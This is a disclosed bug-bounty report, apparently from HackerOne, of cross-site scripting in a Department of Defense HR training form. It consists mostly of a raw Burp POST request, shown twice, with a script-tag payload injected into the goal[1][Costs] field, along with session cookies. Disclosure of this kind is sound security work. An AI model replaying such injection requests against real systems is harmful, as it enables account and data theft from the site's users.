Xss - ███

Disclosed: 2024-03-22 17:47:21 By chor4o To deptofdefense
Medium
Vulnerability Details
Hi teams, Parameter: goal[1][Costs] ███ Burp request POST /HRO/Training/idpgenerate.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw Accept: */* Referer: https://██████/ Cookie: PHPSESSID=l7c1vrsg3dbkgsp2lturjs6kca; session=expiry=1706891234033569; f5avraaaaaaaaaaaaaaaa_session_=DPCHLFADPAJCEMEHGHPOJHBKFGOENAGMGICMOOEBEBBAAMBIPCONEIJCEAGKJOOHAKODPBGOGKMAGOAEFOLAEJAKGNEKCIDJNPNMNCNBDOBDLCEGHGMMPGOEGEOPDMHD; BIGipServerweb-ext_pl=!EeLnWrrwaS8YcvQX1TcgTbCc8QSXMr/IS1+eEgDpVv96YCkn5MOqzqftXSRg0sMRVo16MATZlNeRUg==; nmstat=3aa48c20-a118-1d8b-744c-1042bec21eb1; _ga=GA1.1.736871804.1706875700; _gid=GA1.2.331161195.1706875701; _gat=1; _ga_LY79N0FLBS=GS1.1.1706890028.4.1.1706890425.0.0.0 Content-Length: 3504 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: ███ Connection: Keep-alive ------------YWJkMTQzNDcw Content-Disposition: form-data; name="employeeName" tsSLAueP ------------YWJkMTQzNDcw Content-Disposition: form-data; name="payGrade" 1 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="positionTitle" Mr. ------------YWJkMTQzNDcw Content-Disposition: form-data; name="supervisorName" tsSLAueP ------------YWJkMTQzNDcw Content-Disposition: form-data; name="department" 1 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="year" 2024 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="annMidterm" Annual - November ------------YWJkMTQzNDcw Content-Disposition: form-data; name="filledOutByEmployee" Employee ------------YWJkMTQzNDcw Content-Disposition: form-data; name="filledOutBySupervisor" Supervisor ------------YWJkMTQzNDcw Content-Disposition: form-data; name="development[0][Activity]" 1 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="development[0][Type]" Certifications and Qualifications ------------YWJkMTQzNDcw Content-Disposition: form-data; name="development[0][Priority]" Recommended ------------YWJkMTQzNDcw Content-Disposition: form-data; name="development[0][Purpose]" Meet Future Staffing Needs ------------YWJkMTQzNDcw Content-Disposition: form-data; name="development[0][Fulfillment]" College or University Level Course ------------YWJkMTQzNDcw Content-Disposition: form-data; name="development[0][Costs]" 1 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="development[1][Activity]" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="development[1][Type]" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="development[1][Priority]" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="development[1][Purpose]" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="development[1][Fulfillment]" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="development[1][Costs]" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[0][Activity]" 1 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[0][Term]" Short Term Goal (1-3 years) ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[0][Type]" Personal ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[0][Priority]" Recommended ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[0][Purpose]" Improve Performance ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[0][Fulfillment]" College or University Level Course ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[0][Costs]" 1 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[1][Activity]" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[1][Term]" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[1][Type]" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[1][Priority]" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[1][Purpose]" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[1][Fulfillment]" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[1][Costs]" 1<ScRiPt>alert(9639)</ScRiPt> ------------YWJkMTQzNDcw Content-Disposition: form-data; name="employeeComments" 1 ------------YWJkMTQzNDcw-- █████ Poc ███████ ███ ## Impact The attacker can steal data from whoever checks the report. ## System Host(s) ██████ ## Affected Product(s) and Version(s) ## CVE Numbers ## Steps to Reproduce Burp Request POST /HRO/Training/idpgenerate.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw Accept: */* Referer: https://██████/ Cookie: PHPSESSID=l7c1vrsg3dbkgsp2lturjs6kca; session=expiry=1706891234033569; f5avraaaaaaaaaaaaaaaa_session_=DPCHLFADPAJCEMEHGHPOJHBKFGOENAGMGICMOOEBEBBAAMBIPCONEIJCEAGKJOOHAKODPBGOGKMAGOAEFOLAEJAKGNEKCIDJNPNMNCNBDOBDLCEGHGMMPGOEGEOPDMHD; BIGipServerweb-ext_pl=!EeLnWrrwaS8YcvQX1TcgTbCc8QSXMr/IS1+eEgDpVv96YCkn5MOqzqftXSRg0sMRVo16MATZlNeRUg==; nmstat=3aa48c20-a118-1d8b-744c-1042bec21eb1; _ga=GA1.1.736871804.1706875700; _gid=GA1.2.331161195.1706875701; _gat=1; _ga_LY79N0FLBS=GS1.1.1706890028.4.1.1706890425.0.0.0 Content-Length: 3504 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: █████████ Connection: Keep-alive ------------YWJkMTQzNDcw Content-Disposition: form-data; name="employeeName" tsSLAueP ------------YWJkMTQzNDcw Content-Disposition: form-data; name="payGrade" 1 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="positionTitle" Mr. ------------YWJkMTQzNDcw Content-Disposition: form-data; name="supervisorName" tsSLAueP ------------YWJkMTQzNDcw Content-Disposition: form-data; name="department" 1 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="year" 2024 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="annMidterm" Annual - November ------------YWJkMTQzNDcw Content-Disposition: form-data; name="filledOutByEmployee" Employee ------------YWJkMTQzNDcw Content-Disposition: form-data; name="filledOutBySupervisor" Supervisor ------------YWJkMTQzNDcw Content-Disposition: form-data; name="development[0][Activity]" 1 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="development[0][Type]" Certifications and Qualifications ------------YWJkMTQzNDcw Content-Disposition: form-data; name="development[0][Priority]" Recommended ------------YWJkMTQzNDcw Content-Disposition: form-data; name="development[0][Purpose]" Meet Future Staffing Needs ------------YWJkMTQzNDcw Content-Disposition: form-data; name="development[0][Fulfillment]" College or University Level Course ------------YWJkMTQzNDcw Content-Disposition: form-data; name="development[0][Costs]" 1 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="development[1][Activity]" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="development[1][Type]" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="development[1][Priority]" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="development[1][Purpose]" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="development[1][Fulfillment]" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="development[1][Costs]" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[0][Activity]" 1 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[0][Term]" Short Term Goal (1-3 years) ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[0][Type]" Personal ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[0][Priority]" Recommended ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[0][Purpose]" Improve Performance ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[0][Fulfillment]" College or University Level Course ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[0][Costs]" 1 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[1][Activity]" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[1][Term]" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[1][Type]" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[1][Priority]" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[1][Purpose]" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[1][Fulfillment]" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="goal[1][Costs]" 1<ScRiPt>alert(9639)</ScRiPt> ------------YWJkMTQzNDcw Content-Disposition: form-data; name="employeeComments" 1 ------------YWJkMTQzNDcw-- ## Suggested Mitigation/Remediation Actions
Actions
View on HackerOne
Report Stats
  • Report ID: 2353185
  • State: Closed
  • Substate: resolved
  • Upvotes: 44
Share this report